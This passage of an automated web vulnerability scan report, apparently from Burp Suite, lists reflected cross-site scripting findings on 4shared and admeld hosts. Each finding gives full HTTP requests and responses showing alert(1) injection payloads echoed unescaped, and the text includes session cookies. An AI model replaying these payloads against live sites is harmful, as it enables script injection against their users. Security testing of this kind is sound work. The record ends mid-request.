Cookie: adp=""; JSESSIONID=931F171FB37FF20EDA0F3732F02AE2BB.dc293; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=559849480; df=""; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __qca=P0-1133200866-1297862349616; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; adu=""; dirPwdVerified="";

Response

HTTP/1.1 404 /js/login_fnc.jsdbfde&quot;-alert(1)-&quot;8729de527e7
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4B8B80CCAEE7DF3FF35B41734250E503.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:08:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/login_fnc.jsdbfde"-alert(1)-"8729de527e7";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.445. http://static.4shared.com/js/plugins/jquery.openid.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/plugins/jquery.openid.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b36e"-alert(1)-"a65e025b9c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js2b36e"-alert(1)-"a65e025b9c0/plugins/jquery.openid.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js2b36e&quot;-alert(1)-&quot;a65e025b9c0/plugins/jquery.openid.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4079419CE468B6201E564B4D4B0AFC13.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:54 GMT
Content-Length: 36230


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js2b36e"-alert(1)-"a65e025b9c0/plugins/jquery.openid.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function fe
...[SNIP]...

3.446. http://static.4shared.com/js/plugins/jquery.openid.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/plugins/jquery.openid.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 938f0"-alert(1)-"0ba47aec0e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/plugins938f0"-alert(1)-"0ba47aec0e3/jquery.openid.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/plugins938f0&quot;-alert(1)-&quot;0ba47aec0e3/jquery.openid.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=98C9E08BA66033E05F22FEFFAB2D92E6.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:00 GMT
Content-Length: 36230


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/plugins938f0"-alert(1)-"0ba47aec0e3/jquery.openid.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

3.447. http://static.4shared.com/js/plugins/jquery.openid.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/plugins/jquery.openid.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e541a"-alert(1)-"0f1b43c7c9d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/plugins/jquery.openid.jse541a"-alert(1)-"0f1b43c7c9d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/plugins/jquery.openid.jse541a&quot;-alert(1)-&quot;0f1b43c7c9d
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1C143464BBA385C37A4E2F937E7C446F.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:05 GMT
Content-Length: 36219


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/plugins/jquery.openid.jse541a"-alert(1)-"0f1b43c7c9d";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.448. http://static.4shared.com/js/signup-script.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/signup-script.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1f89"-alert(1)-"d8bdea6d6a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsc1f89"-alert(1)-"d8bdea6d6a7/signup-script.jsp?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /jsc1f89&quot;-alert(1)-&quot;d8bdea6d6a7/signup-script.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=37539B6328ADF8C92CE74F121083CDC1.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:50 GMT
Content-Length: 36195


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/jsc1f89"-alert(1)-"d8bdea6d6a7/signup-script.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback(
...[SNIP]...

3.449. http://static.4shared.com/js/signup-script.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/signup-script.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 871d8"-alert(1)-"3e7896575aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/signup-script.jsp871d8"-alert(1)-"3e7896575aa?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/signup-script.jsp871d8&quot;-alert(1)-&quot;3e7896575aa
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1FA208822AC4E87AC84DD6BBC3E34F4F.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:54 GMT
Content-Length: 36195


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/signup-script.jsp871d8"-alert(1)-"3e7896575aa";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.450. http://static.4shared.com/press_room/press_room.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /press_room/press_room.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7306f"-alert(1)-"185336a2aa2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /press_room7306f"-alert(1)-"185336a2aa2/press_room.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /press_room7306f&quot;-alert(1)-&quot;185336a2aa2/press_room.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BAB306016A90DE13652BCA754E6DB680.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:19 GMT
Content-Length: 36220


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/press_room7306f"-alert(1)-"185336a2aa2/press_room.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
...[SNIP]...

3.451. http://static.4shared.com/press_room/press_room.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /press_room/press_room.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e703"-alert(1)-"88745b017aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /press_room/press_room.css9e703"-alert(1)-"88745b017aa HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /press_room/press_room.css9e703&quot;-alert(1)-&quot;88745b017aa
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AA804B0B34E735B008C1BC3E9368AF61.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:25 GMT
Content-Length: 36220


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/press_room/press_room.css9e703"-alert(1)-"88745b017aa";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.452. http://static.4shared.com/themes/default.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /themes/default.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f1a9"-alert(1)-"b65b614c6be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /themes7f1a9"-alert(1)-"b65b614c6be/default.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /themes7f1a9&quot;-alert(1)-&quot;b65b614c6be/default.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=480EF7610CAC6BBB0D085FFC3EAB1570.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:22 GMT
Content-Length: 36174


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/themes7f1a9"-alert(1)-"b65b614c6be/default.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.453. http://static.4shared.com/themes/default.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /themes/default.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8a6b"-alert(1)-"5873520bbff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /themes/default.cssd8a6b"-alert(1)-"5873520bbff?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /themes/default.cssd8a6b&quot;-alert(1)-&quot;5873520bbff
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B3A7A8AF385D4FC1A8E0ED110F3EB0BE.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:26 GMT
Content-Length: 36185


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/themes/default.cssd8a6b"-alert(1)-"5873520bbff";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.454. http://tag.admeld.com/ad/json/100/glammedia/160x600/367631667 [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/json/100/glammedia/160x600/367631667

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5ec34<script>alert(1)</script>39e86d48143 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/json/100/glammedia/160x600/367631667?url=http%3A//poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/&callback=GlamAdmeldRenderJsAd5ec34<script>alert(1)</script>39e86d48143&floor_price=0.70&container=ADMELD76212205993 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMTAwLCAgc2l0ZTogICAgICAgICAiZ2xhbW1lZGlhIiwgIGFkOiAgICAgICAgICAgLTEsICBuZXR3b3JrOiAgICAgICJhZG1lbGRwc2EiLCAgc2l6ZTogICAgICAgICAiMTYweDYwMCIsICBmcmVxOiAgICAgICAgICIwLTAiLCAgZGVmYXVsdHM6ICAgICAiMC0wIiwgIHJlcXVlc3Q6ICAgICAgIjYzZGEzZDUyLWNmNDEtNDllNS05YjI1LWE0MDYwNmM1MTc1MCIsICB1c2VyOiAgICAgICAgICJhYzVhZmU4OS1kYmUzLTRhOTktOWM2MC01OWY0ZmI0OTVjYjkiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgIjM2NzYzMTY2NyIsICBkaXY6ICAgICAgICAgICI2M2RhM2Q1Mi1jZjQxLTQ5ZTUtOWIyNS1hNDA2MDZjNTE3NTAiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3BvcG9udGhlcG9wLmNvbS8yMDExLzA0L2xpbmRzYXktbG9oYW4tbG9zZXMtdmljdG9yaWEtZ290dGktcm9sZS8iLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAiaG91c2UiLCAgaW1wOiAgICAgICAgICA0MywgIG5ldHdvcmtfaWQ6ICAgMCwgIGFjY291bnRfaWQ6ICAgMCwgIG5ldHdvcmtfbmFtZTogIkFkTWVsZCBQU0EiLCAgcHVibGlzaGVyX25hbWU6ICJnbGFtIiwgIGVjcG06ICAgICAgICAgIjAuNzAiLCAgZmVjcG06ICAgICAgICAiMC43MCIsICBmaWxsOiAgICAgICAgICIxMDAuMDAiLCAgcGxhY2VtZW50OiAgICAiMzY3NjMxNjY3IiwgIHJ1bGU6ICAgICAgICAgIjM2NzYzMTY2NyIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbXSwgIHRhcmdldGluZzogICAgIiIsICBhZHZlcnRpc2VyOiAgICAiIiwgIGxhbmRpbmdfcGFnZTogICAgIiIsICBob3N0OiAgICAgICAgICJuai10YWcyMSJ9
Content-Length: 367
Content-Type: application/javascript
Date: Thu, 21 Apr 2011 01:28:58 GMT
Connection: close

GlamAdmeldRenderJsAd5ec34<script>alert(1)</script>39e86d48143({"ad":{"id":-1,"adProviderId":0,"adProviderName":"admeldpsa","width":160,"height":600,"container":"ADMELD76212205993","bid":0.00,"requestId":"63da3d52-cf41-49e5-9b25-a40606c51750","views":0,"expires":
...[SNIP]...

3.455. http://tag.admeld.com/ad/json/100/glammedia/160x600/367631667 [container parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/json/100/glammedia/160x600/367631667

Issue detail

The value of the container request parameter is copied into the HTML document as plain text between tags. The payload 26828<script>alert(1)</script>9a4422dcdde was submitted in the container parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/json/100/glammedia/160x600/367631667?url=http%3A//poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/&callback=GlamAdmeldRenderJsAd&floor_price=0.70&container=ADMELD7621220599326828<script>alert(1)</script>9a4422dcdde HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMTAwLCAgc2l0ZTogICAgICAgICAiZ2xhbW1lZGlhIiwgIGFkOiAgICAgICAgICAgLTEsICBuZXR3b3JrOiAgICAgICJhZG1lbGRwc2EiLCAgc2l6ZTogICAgICAgICAiMTYweDYwMCIsICBmcmVxOiAgICAgICAgICIwLTAiLCAgZGVmYXVsdHM6ICAgICAiMC0wIiwgIHJlcXVlc3Q6ICAgICAgImVlOTY5MzRiLTYzZGQtNDgxOC05NzgwLWZmOGQ0MzZkZDhhZiIsICB1c2VyOiAgICAgICAgICJhYzVhZmU4OS1kYmUzLTRhOTktOWM2MC01OWY0ZmI0OTVjYjkiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgIjM2NzYzMTY2NyIsICBkaXY6ICAgICAgICAgICJlZTk2OTM0Yi02M2RkLTQ4MTgtOTc4MC1mZjhkNDM2ZGQ4YWYiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3BvcG9udGhlcG9wLmNvbS8yMDExLzA0L2xpbmRzYXktbG9oYW4tbG9zZXMtdmljdG9yaWEtZ290dGktcm9sZS8iLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAiaG91c2UiLCAgaW1wOiAgICAgICAgICA3MCwgIG5ldHdvcmtfaWQ6ICAgMCwgIGFjY291bnRfaWQ6ICAgMCwgIG5ldHdvcmtfbmFtZTogIkFkTWVsZCBQU0EiLCAgcHVibGlzaGVyX25hbWU6ICJnbGFtIiwgIGVjcG06ICAgICAgICAgIjAuNzAiLCAgZmVjcG06ICAgICAgICAiMC43MCIsICBmaWxsOiAgICAgICAgICIxMDAuMDAiLCAgcGxhY2VtZW50OiAgICAiMzY3NjMxNjY3IiwgIHJ1bGU6ICAgICAgICAgIjM2NzYzMTY2NyIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbXSwgIHRhcmdldGluZzogICAgIiIsICBhZHZlcnRpc2VyOiAgICAiIiwgIGxhbmRpbmdfcGFnZTogICAgIiIsICBob3N0OiAgICAgICAgICJuai10YWcxNyJ9
Content-Length: 367
Content-Type: application/javascript
Date: Thu, 21 Apr 2011 01:29:00 GMT
Connection: close

GlamAdmeldRenderJsAd({"ad":{"id":-1,"adProviderId":0,"adProviderName":"admeldpsa","width":160,"height":600,"container":"ADMELD7621220599326828<script>alert(1)</script>9a4422dcdde","bid":0.00,"requestId":"ee96934b-63dd-4818-9780-ff8d436dd8af","views":0,"expires":1303349400,"creative":"<img src=\"http://tag.admeld.com/psa/adc_es_green_160x600.jpg\"/>
...[SNIP]...

3.456. http://tag.admeld.com/ad/json/100/glammedia/728x90/367631667 [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/json/100/glammedia/728x90/367631667

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload abcb9<script>alert(1)</script>3d8eb2f0e91 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/json/100/glammedia/728x90/367631667?01AD=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g&01RI=035843F03C56E88&01NA=&url=http%3A//poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/&callback=GlamAdmeldRenderJsAdabcb9<script>alert(1)</script>3d8eb2f0e91&floor_price=0.70&container=ADMELD6529836193 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/
